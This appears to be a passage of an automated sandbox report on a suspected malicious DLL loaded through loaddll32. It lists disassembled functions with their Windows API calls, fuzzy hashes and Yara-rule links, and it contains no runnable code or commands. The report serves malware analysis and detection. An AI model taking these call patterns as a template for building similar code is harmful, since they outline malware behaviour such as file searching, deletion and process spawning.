                • Instruction ID: bde170d09b4c093828c9f6b8d2607ba5e333e6f01d7ce906584da527e3ed0975
                • Opcode Fuzzy Hash: 5a2b5f1568f574c83181d6c0ad360ed0bfbe55b6cc7b8f9d84af0c61b110df5a
                • Instruction Fuzzy Hash: 7BB13671604306EFD711EFAADC44E2A77E9EB88304F055429F548DB261E73AEC158F61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D2924 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 219memoryfilestringCOMMON
                Download Yara Rule
                APIs
                • GetLastError.KERNEL32 ref: 046D2940
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046D295C
                • GetLastError.KERNEL32 ref: 046D29AB
                • HeapFree.KERNEL32(00000000,00000000), ref: 046D29C1
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046D29D5
                • GetLastError.KERNEL32 ref: 046D29EF
                • GetLastError.KERNEL32 ref: 046D2A22
                • HeapFree.KERNEL32(00000000,00000000), ref: 046D2A40
                • lstrlenW.KERNEL32(00000000,?), ref: 046D2A6C
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046D2A81
                • DeleteFileW.KERNEL32(?,00000000,?,?,00000000,00000000,00000001), ref: 046D2B55
                • HeapFree.KERNEL32(00000000,?), ref: 046D2B64
                • WaitForSingleObject.KERNEL32(00000000), ref: 046D2B79
                • HeapFree.KERNEL32(00000000,00000000), ref: 046D2B8C
                • HeapFree.KERNEL32(00000000,?), ref: 046D2B9E
                • RtlExitUserThread.NTDLL(?,?), ref: 046D2BB3
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Free$ErrorLast$Allocate$DeleteExitFileObjectSingleThreadUserWaitlstrlen
                • String ID:
                • API String ID: 3853681310-3916222277
                • Opcode ID: 6524ac25f875e376535539852d14c8c37b296d561a072a91151954dcdc49846d
                • Instruction ID: a14788d505da8e24f91564ea026fe77ecfb01a86fc05d7051332ea4063421d60
                • Opcode Fuzzy Hash: 6524ac25f875e376535539852d14c8c37b296d561a072a91151954dcdc49846d
                • Instruction Fuzzy Hash: 91812B7190020AEFDB10DFA6DD88EAE7BF8FB48704B0450A9F505AB250F779AD45DB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D7DDD Relevance: 27.3, APIs: 18, Instructions: 274memorystringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046CBC31: RegQueryValueExA.KERNELBASE(?,046DE5BD,00000000,046DE5BD,00000000,046D6019,00000003,00000000,?,00000000,?,046DE5BD,046DE5BD,?,046D6019,00000000), ref: 046CBC69
                  • Part of subcall function 046CBC31: RtlAllocateHeap.NTDLL(00000000,046D6019), ref: 046CBC7D
                  • Part of subcall function 046CBC31: RegQueryValueExA.ADVAPI32(?,046DE5BD,00000000,046DE5BD,00000000,046D6019,?,046D6019,00000000,046DE5BD,?,?,?,046DE5BD,?), ref: 046CBC97
                  • Part of subcall function 046CBC31: RegCloseKey.ADVAPI32(?,?,046D6019,00000000,046DE5BD,?,?,?,046DE5BD,?,?,?,00000000,?,?,?), ref: 046CBCC1
                • HeapFree.KERNEL32(00000000,?,?,?,046C158F,74E5F710,00000000,00000000), ref: 046D7E24
                • RtlAllocateHeap.NTDLL(00000000,00010000,?), ref: 046D7E42
                • HeapFree.KERNEL32(00000000,00000000,00000029,00000000,00000000,?,?,?,?,?,?,046C158F), ref: 046D7E6E
                • HeapFree.KERNEL32(00000000,00000000,0000002A,00000000,00000000,00000000,?,00000000,?,?,046C158F), ref: 046D7EDC
                • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 046D7F54
                • wsprintfA.USER32 ref: 046D7F70
                • lstrlen.KERNEL32(00000000,00000000), ref: 046D7F7B
                • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 046D7F92
                • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 046D801E
                • wsprintfA.USER32 ref: 046D8039
                • lstrlen.KERNEL32(00000000,00000000), ref: 046D8044
                • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 046D805B
                • HeapFree.KERNEL32(00000000,046C158F,?,?,00000008,0000000B,?,046C158F,046C158F,00000001,?,00000000,?,?,046C158F), ref: 046D807D
                • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 046D8098
                • wsprintfA.USER32 ref: 046D80AF
                • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,046C158F), ref: 046D80BA
                  • Part of subcall function 046CB823: lstrlen.KERNEL32(046C1127,?,00000000,00000000,046C2C06,00000011,046C1127,00000001,00000000,?,-00000008,?,046C1127,00000000,?,?), ref: 046CB853
                  • Part of subcall function 046CB823: RtlAllocateHeap.NTDLL(00000000,-00000008,?), ref: 046CB869
                  • Part of subcall function 046CB823: memcpy.NTDLL(00000010,?,00000000), ref: 046CB89F
                  • Part of subcall function 046CB823: memcpy.NTDLL(00000010,00000000,?), ref: 046CB8BA
                  • Part of subcall function 046CB823: CallNamedPipeA.KERNEL32(00000000,-00000008,?,00000010,00000028,00000001), ref: 046CB8D8
                  • Part of subcall function 046CB823: GetLastError.KERNEL32 ref: 046CB8E2
                  • Part of subcall function 046CB823: HeapFree.KERNEL32(00000000,00000000), ref: 046CB905
                • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000,?,?,?,?,?,?,?,?,?,046C158F), ref: 046D80D1
                • HeapFree.KERNEL32(00000000,?,0000001D,00000008,?,04C98A20,?,?,?,?,?,?,?,?,?,046C158F), ref: 046D80FD
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Free$Allocate$lstrlen$wsprintf$QueryValuememcpy$CallCloseErrorLastNamedPipe
                • String ID:
                • API String ID: 3130754786-0
                • Opcode ID: cfc8a99a980d6f46a13868fd6819b2e54e71788f78dba28cd6c287f0f0b341c0
                • Instruction ID: f8b7fc174a4f60a3bea0b23e7f23ad73b36b2e083cfd1066f172d006a615f9e4
                • Opcode Fuzzy Hash: cfc8a99a980d6f46a13868fd6819b2e54e71788f78dba28cd6c287f0f0b341c0
                • Instruction Fuzzy Hash: 89A15CB1D00209EFEB20EF96DC88DAEBBB9FB48305B004429E515A7250F7356E55DF61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DC452 Relevance: 24.3, APIs: 16, Instructions: 258memorystringfileCOMMON
                Download Yara Rule
                APIs
                • lstrlenW.KERNEL32(?), ref: 046DC467
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(?,00000000,74E069A0,?,00000250,?,00000000), ref: 046DD3E9
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,046C39E4), ref: 046DD3F5
                  • Part of subcall function 046DD39D: memset.NTDLL ref: 046DD43D
                  • Part of subcall function 046DD39D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 046DD458
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(0000002C), ref: 046DD490
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(?), ref: 046DD498
                  • Part of subcall function 046DD39D: memset.NTDLL ref: 046DD4BB
                  • Part of subcall function 046DD39D: wcscpy.NTDLL ref: 046DD4CD
                  • Part of subcall function 046DD39D: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 046DD4F3
                  • Part of subcall function 046DD39D: RtlEnterCriticalSection.NTDLL(?), ref: 046DD528
                  • Part of subcall function 046DD39D: RtlLeaveCriticalSection.NTDLL(?), ref: 046DD544
                  • Part of subcall function 046DD39D: FindNextFileW.KERNEL32(?,00000000), ref: 046DD55D
                  • Part of subcall function 046DD39D: WaitForSingleObject.KERNEL32(00000000), ref: 046DD56F
                  • Part of subcall function 046DD39D: FindClose.KERNEL32(?), ref: 046DD584
                  • Part of subcall function 046DD39D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 046DD598
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(0000002C), ref: 046DD5BA
                • RtlAllocateHeap.NTDLL(00000000,00000036,?), ref: 046DC4C3
                • memcpy.NTDLL(00000000,?,00000000), ref: 046DC4D6
                • lstrcpyW.KERNEL32(00000000,?), ref: 046DC4ED
                  • Part of subcall function 046DD39D: FindNextFileW.KERNEL32(?,00000000), ref: 046DD630
                  • Part of subcall function 046DD39D: WaitForSingleObject.KERNEL32(00000000), ref: 046DD642
                  • Part of subcall function 046DD39D: FindClose.KERNEL32(?), ref: 046DD65D
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000010), ref: 046DC518
                • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 046DC530
                • HeapFree.KERNEL32(00000000,00000000), ref: 046DC58A
                • lstrlenW.KERNEL32(00000000,?), ref: 046DC5AD
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046DC5BF
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000014), ref: 046DC633
                • HeapFree.KERNEL32(00000000,?), ref: 046DC643
                  • Part of subcall function 046C1B8A: lstrlen.KERNEL32(?,00000008,00000000,?,00000000,046DDB18,?,?,00000000,046CC692,?,?,?,?,00000000,?), ref: 046C1B99
                  • Part of subcall function 046C1B8A: mbstowcs.NTDLL ref: 046C1BB5
                • CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 046DC66C
                • lstrlenW.KERNEL32(046EF878,?), ref: 046DC6E6
                • DeleteFileW.KERNEL32(?,?), ref: 046DC714
                • HeapFree.KERNEL32(00000000,?), ref: 046DC722
                • HeapFree.KERNEL32(00000000,?), ref: 046DC743
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heaplstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymbstowcsmemcpywcscpy
                • String ID:
                • API String ID: 72361108-0
                • Opcode ID: 9b36dbe49154262596f0aa8d28af22201e0876b7b4c08bce790c28616013f2b3
                • Instruction ID: be22460fb1c71b73fd09487a8bea87f1686be3f8f78a06c8cee8171791f9b37c
                • Opcode Fuzzy Hash: 9b36dbe49154262596f0aa8d28af22201e0876b7b4c08bce790c28616013f2b3
                • Instruction Fuzzy Hash: B3914571A0121ABFDB10DFA6DC88DAA3BFCEB49340B045465F509DB211F735AA45CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DEF27 Relevance: 24.1, APIs: 16, Instructions: 131memoryregistrythreadCOMMON
                Download Yara Rule
                APIs
                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 046DEF49
                • RtlEnterCriticalSection.NTDLL(00000000), ref: 046DEF66
                • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 046DEFB6
                • DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 046DEFC0
                • GetLastError.KERNEL32 ref: 046DEFCA
                • HeapFree.KERNEL32(00000000,00000000), ref: 046DEFDB
                • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 046DEFFD
                • HeapFree.KERNEL32(00000000,?), ref: 046DF034
                • RtlLeaveCriticalSection.NTDLL(00000000), ref: 046DF048
                • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 046DF051
                • SuspendThread.KERNEL32(?), ref: 046DF060
                • CreateEventA.KERNEL32(046EE268,00000001,00000000), ref: 046DF074
                • SetEvent.KERNEL32(00000000), ref: 046DF081
                • CloseHandle.KERNEL32(00000000), ref: 046DF088
                • Sleep.KERNEL32(000001F4), ref: 046DF09B
                • ResumeThread.KERNEL32(?), ref: 046DF0BF
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
                • String ID:
                • API String ID: 1011176505-0
                • Opcode ID: 16d6c0ab3188e8729f8e4962be2180ecae9c036bfbf7e573187453dce2592fc0
                • Instruction ID: fd7b0973d9709e0d33c04775f84b874b18a1ebe9cbdb6735e81ca5e412d8db17
                • Opcode Fuzzy Hash: 16d6c0ab3188e8729f8e4962be2180ecae9c036bfbf7e573187453dce2592fc0
                • Instruction Fuzzy Hash: E4415072900509EFDB10AFA6DC889ADBBF9FB14304B145069F601EB210F7366D91DB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C7CA8 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 149stringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • memset.NTDLL ref: 046C7CD6
                • StrChrA.SHLWAPI(?,0000000D), ref: 046C7D1C
                • StrChrA.SHLWAPI(?,0000000A), ref: 046C7D29
                • StrChrA.SHLWAPI(?,0000007C), ref: 046C7D50
                • StrTrimA.SHLWAPI(?,046EA4A4), ref: 046C7D65
                • StrChrA.SHLWAPI(?,0000003D), ref: 046C7D6E
                • StrTrimA.SHLWAPI(00000001,046EA4A4), ref: 046C7D84
                • _strupr.NTDLL ref: 046C7D8B
                • StrTrimA.SHLWAPI(?,?), ref: 046C7D98
                • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 046C7DE0
                • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,00000000,?,?,046C158F), ref: 046C7DFF
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
                • String ID: $;
                • API String ID: 4019332941-73438061
                • Opcode ID: 51e969bb6141eda0c64b37a49209c9911c3113a5be5b51acae653b508458be4b
                • Instruction ID: d43bbbea4b4faad4b80d051f96fef79cb3447de73904b39500fb99b80b5955cd
                • Opcode Fuzzy Hash: 51e969bb6141eda0c64b37a49209c9911c3113a5be5b51acae653b508458be4b
                • Instruction Fuzzy Hash: BA418F726043069FD321AF698C44B3ABBE9EB58701F04081EF9959B251FB74F9058BA6
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E2BDD Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 121processstringCOMMON
                Download Yara Rule
                APIs
                • memset.NTDLL ref: 046E2BF2
                  • Part of subcall function 046C1B8A: lstrlen.KERNEL32(?,00000008,00000000,?,00000000,046DDB18,?,?,00000000,046CC692,?,?,?,?,00000000,?), ref: 046C1B99
                  • Part of subcall function 046C1B8A: mbstowcs.NTDLL ref: 046C1BB5
                • lstrlenW.KERNEL32(00000000,00000000,00000000,7764DBB0,00000020,00000000), ref: 046E2C2B
                • wcstombs.NTDLL ref: 046E2C35
                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,7764DBB0,00000020,00000000), ref: 046E2C66
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,046DFD2F), ref: 046E2C92
                • TerminateProcess.KERNEL32(?,000003E5), ref: 046E2CA8
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,046DFD2F), ref: 046E2CBC
                • GetLastError.KERNEL32 ref: 046E2CC0
                • GetExitCodeProcess.KERNEL32(?,00000001), ref: 046E2CE0
                • CloseHandle.KERNEL32(?), ref: 046E2CEF
                • CloseHandle.KERNEL32(?), ref: 046E2CF4
                • GetLastError.KERNEL32 ref: 046E2CF8
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
                • String ID: D
                • API String ID: 2463014471-2746444292
                • Opcode ID: 5cec57648281fb5fd273792b6597c9fe2f142a64ba448eacf93363301848cd70
                • Instruction ID: 6a8eba1053d3fad7fc162f87bab6e90d4e460639eaf215d70eb6a9dcac87c97c
                • Opcode Fuzzy Hash: 5cec57648281fb5fd273792b6597c9fe2f142a64ba448eacf93363301848cd70
                • Instruction Fuzzy Hash: 7D4148B5901118FFEB11EFA6CD859FEBBFDEB08644F20406AE501B7250F675AE018B60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C76A4 Relevance: 21.2, APIs: 14, Instructions: 201memorystringthreadCOMMON
                Download Yara Rule
                APIs
                • StrChrA.SHLWAPI(046C158F,0000002C,00000000,?,00000000,046DC9ED,?,00000000,0000001E,00000001,00000057,046C159F,046C158F,00000000,0000000B,?), ref: 046C76F3
                • StrTrimA.SHLWAPI(00000001,?,?,00000000,046DC9ED,?,00000000,0000001E,00000001,00000057,046C159F,046C158F,00000000,0000000B,?,046C158F), ref: 046C770C
                • StrChrA.SHLWAPI(046C158F,0000002C,00000000,?,00000000,046DC9ED,?,00000000,0000001E,00000001,00000057,046C159F,046C158F,00000000,0000000B,?), ref: 046C7717
                • StrTrimA.SHLWAPI(00000001,?,?,00000000,046DC9ED,?,00000000,0000001E,00000001,00000057,046C159F,046C158F,00000000,0000000B,?,046C158F), ref: 046C7730
                • lstrlen.KERNEL32(00000000,00000001,?,?,00000000,?,00000000,046DC9ED,?,00000000,0000001E,00000001,00000057,046C159F,046C158F,00000000), ref: 046C77C8
                • RtlAllocateHeap.NTDLL(00000000,?,00000001), ref: 046C77EA
                • lstrcpy.KERNEL32(00000020,?), ref: 046C7809
                • lstrlen.KERNEL32(?,?,00000000,046DC9ED,?,00000000,0000001E,00000001,00000057,046C159F,046C158F,00000000,0000000B,?,046C158F,046C158F), ref: 046C7813
                • memcpy.NTDLL(?,?,?,?,00000000,046DC9ED,?,00000000,0000001E,00000001,00000057,046C159F,046C158F,00000000,0000000B,?), ref: 046C7854
                • memcpy.NTDLL(?,?,?,?,?,00000000,046DC9ED,?,00000000,0000001E,00000001,00000057,046C159F,046C158F,00000000,0000000B), ref: 046C7867
                • SwitchToThread.KERNEL32(00000057,00000000,?,0000001E,?,?,?,?,?,00000000,046DC9ED,?,00000000,0000001E,00000001,00000057), ref: 046C788B
                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000001E,?,?,?,?,?,00000000,046DC9ED,?,00000000,0000001E), ref: 046C78AA
                • HeapFree.KERNEL32(00000000,?,00000001,?,?,00000000,?,00000000,046DC9ED,?,00000000,0000001E,00000001,00000057,046C159F,046C158F), ref: 046C78D0
                • HeapFree.KERNEL32(00000000,00000001,00000001,?,?,00000000,?,00000000,046DC9ED,?,00000000,0000001E,00000001,00000057,046C159F,046C158F), ref: 046C78EC
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
                • String ID:
                • API String ID: 3323474148-0
                • Opcode ID: 96389755c507815640a7f91a615cf4287e3b72a81bfa1e9f68c130c4371056b1
                • Instruction ID: 8836f917793c55573155b213a576ce47d2caa8f839c2ace37043d34e7f2e9699
                • Opcode Fuzzy Hash: 96389755c507815640a7f91a615cf4287e3b72a81bfa1e9f68c130c4371056b1
                • Instruction Fuzzy Hash: 34716532508306AFD721DF25C844A6ABBE8FB88315F04492EF59997250F735EA45CFA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C9DA0 Relevance: 21.2, APIs: 14, Instructions: 161memorystringfileCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(?,?,00000000), ref: 046C9DB7
                • lstrlen.KERNEL32(?,?,00000000), ref: 046C9DBE
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046C9DD5
                • lstrcpy.KERNEL32(00000000,?), ref: 046C9DE6
                • lstrcat.KERNEL32(?,?), ref: 046C9E02
                • lstrcat.KERNEL32(?,?), ref: 046C9E13
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046C9E24
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046C9EC1
                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,00000000), ref: 046C9EFA
                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 046C9F13
                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 046C9F1D
                • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 046C9F2D
                • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 046C9F46
                • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 046C9F56
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
                • String ID:
                • API String ID: 333890978-0
                • Opcode ID: 711e5d196ca48111630e8cd5f09c4b9f1b9781990a83b2567ff296a0c89430f4
                • Instruction ID: d4614ec8460da878dbee77b318be19829623bc7bb46fb98b64c224b680f072e5
                • Opcode Fuzzy Hash: 711e5d196ca48111630e8cd5f09c4b9f1b9781990a83b2567ff296a0c89430f4
                • Instruction Fuzzy Hash: C8517AB6800209FFDB11AFA5DC84CAE7BBDFB48344B049069F6159B210E7759E49DF60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DC1FB Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 128timeCOMMON
                Download Yara Rule
                APIs
                • wsprintfA.USER32 ref: 046DC23D
                • OpenWaitableTimerA.KERNEL32(00100000,00000000,046D5DB1), ref: 046DC250
                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,046D5DB1,00000000,?), ref: 046DC368
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • memset.NTDLL ref: 046DC273
                • memcpy.NTDLL(?,000493E0,00000010,?,?,00000040,?,?,?,?,?,?,046D5DB1,00000000,?), ref: 046DC2F2
                • RtlEnterCriticalSection.NTDLL(?), ref: 046DC307
                • RtlLeaveCriticalSection.NTDLL(?), ref: 046DC31F
                • GetLastError.KERNEL32(046D842E,?,?,?,?,?,?,?,00000040,?,?,?,?,?,?,046D5DB1), ref: 046DC337
                • RtlEnterCriticalSection.NTDLL(?), ref: 046DC343
                • RtlLeaveCriticalSection.NTDLL(?), ref: 046DC352
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalSection$EnterLeave$AllocateCloseErrorHandleHeapLastOpenTimerWaitablememcpymemsetwsprintf
                • String ID: 0x%08X$W
                • API String ID: 1559661116-2600449260
                • Opcode ID: f8695894a6c9354806f5ab30a3a6086f881b7e164ee84068098aa8fdd80e5826
                • Instruction ID: 81ad2dfa983960ede8ae40326eb1f07edc858b223d470db9ae18f9a50e6261ec
                • Opcode Fuzzy Hash: f8695894a6c9354806f5ab30a3a6086f881b7e164ee84068098aa8fdd80e5826
                • Instruction Fuzzy Hash: 7F414DB1900709EFDB20DFA5C848AAEBBF8FF08754F108529E549D7280E375AA54CB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CD95E Relevance: 21.1, APIs: 14, Instructions: 107libraryloaderstringCOMMON
                Download Yara Rule
                APIs
                • lstrlenW.KERNEL32(?,00000000,?,?,?,046CB20B,?,?), ref: 046CD96B
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,046CB20B,?,?), ref: 046CD994
                • lstrcpyW.KERNEL32(-0000FFFE,?), ref: 046CD9B4
                • lstrcpyW.KERNEL32(-00000002,?), ref: 046CD9CF
                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,046CB20B,?,?), ref: 046CD9DB
                • LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,046CB20B,?,?), ref: 046CD9DE
                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,046CB20B,?,?), ref: 046CD9EA
                • GetProcAddress.KERNEL32(00000000,?), ref: 046CDA07
                • GetProcAddress.KERNEL32(00000000,?), ref: 046CDA21
                • GetProcAddress.KERNEL32(00000000,?), ref: 046CDA37
                • GetProcAddress.KERNEL32(00000000,?), ref: 046CDA4D
                • GetProcAddress.KERNEL32(00000000,?), ref: 046CDA63
                • GetProcAddress.KERNEL32(00000000,?), ref: 046CDA79
                • FreeLibrary.KERNEL32(00000000,?,?,?,?,046CB20B,?,?), ref: 046CDAA2
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
                • String ID:
                • API String ID: 3772355505-0
                • Opcode ID: 7f0137089b2848afcd8b993c648763b3a1595f1c8ca942c716e6b8b04109f791
                • Instruction ID: 609a7d96d084e0ad891026cb6882ccd956628f2445c1577518562eb06e3ad11c
                • Opcode Fuzzy Hash: 7f0137089b2848afcd8b993c648763b3a1595f1c8ca942c716e6b8b04109f791
                • Instruction Fuzzy Hash: 923127B1A1520BAFD710EF65DD88D667BECEF44344B04552AE848CB212FB39ED018FA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C62A6 Relevance: 21.1, APIs: 14, Instructions: 79stringmemoryfileCOMMON
                Download Yara Rule
                APIs
                • lstrlenW.KERNEL32(?,?,00000000,?,?,?,046DC710,?,?,?), ref: 046C62BD
                • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,046DC710,?,?,?), ref: 046C62C8
                • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,046DC710,?,?,?), ref: 046C62D0
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046C62E5
                • lstrcpyW.KERNEL32(00000000,?), ref: 046C62F6
                • lstrcatW.KERNEL32(00000000,?), ref: 046C6308
                • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,046DC710,?,?,?), ref: 046C630D
                • lstrcatW.KERNEL32(00000000,046E83F0), ref: 046C6319
                • lstrcatW.KERNEL32(00000000), ref: 046C6321
                • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,046DC710,?,?,?), ref: 046C6326
                • lstrcatW.KERNEL32(00000000,046E83F0), ref: 046C6332
                • lstrcatW.KERNEL32(00000000,00000002), ref: 046C634D
                • CopyFileW.KERNEL32(?,00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,046DC710,?,?,?), ref: 046C6355
                • HeapFree.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,046DC710,?,?,?), ref: 046C6363
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
                • String ID:
                • API String ID: 3635185113-0
                • Opcode ID: cb41e84600360d799e0b124e0c979ae7dc16f6c5e65a5ccca566e5ab6a9e3af3
                • Instruction ID: 93b8fd522ab0d413a8c8d171fa4eb78a46c5c57fce3ee5ea6669cddd712764f4
                • Opcode Fuzzy Hash: cb41e84600360d799e0b124e0c979ae7dc16f6c5e65a5ccca566e5ab6a9e3af3
                • Instruction Fuzzy Hash: 1221CD32100205ABD321BF56DC88E7B7BE8EF95B54F00141DF50597150EB69AC0A8BB5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D1590 Relevance: 18.2, APIs: 12, Instructions: 196memorystringthreadCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046DB89D: RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 046DB8E2
                  • Part of subcall function 046DB89D: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 046DB8FA
                  • Part of subcall function 046DB89D: WaitForSingleObject.KERNEL32(00000000,?,?,?,046C140C,?), ref: 046DB9C2
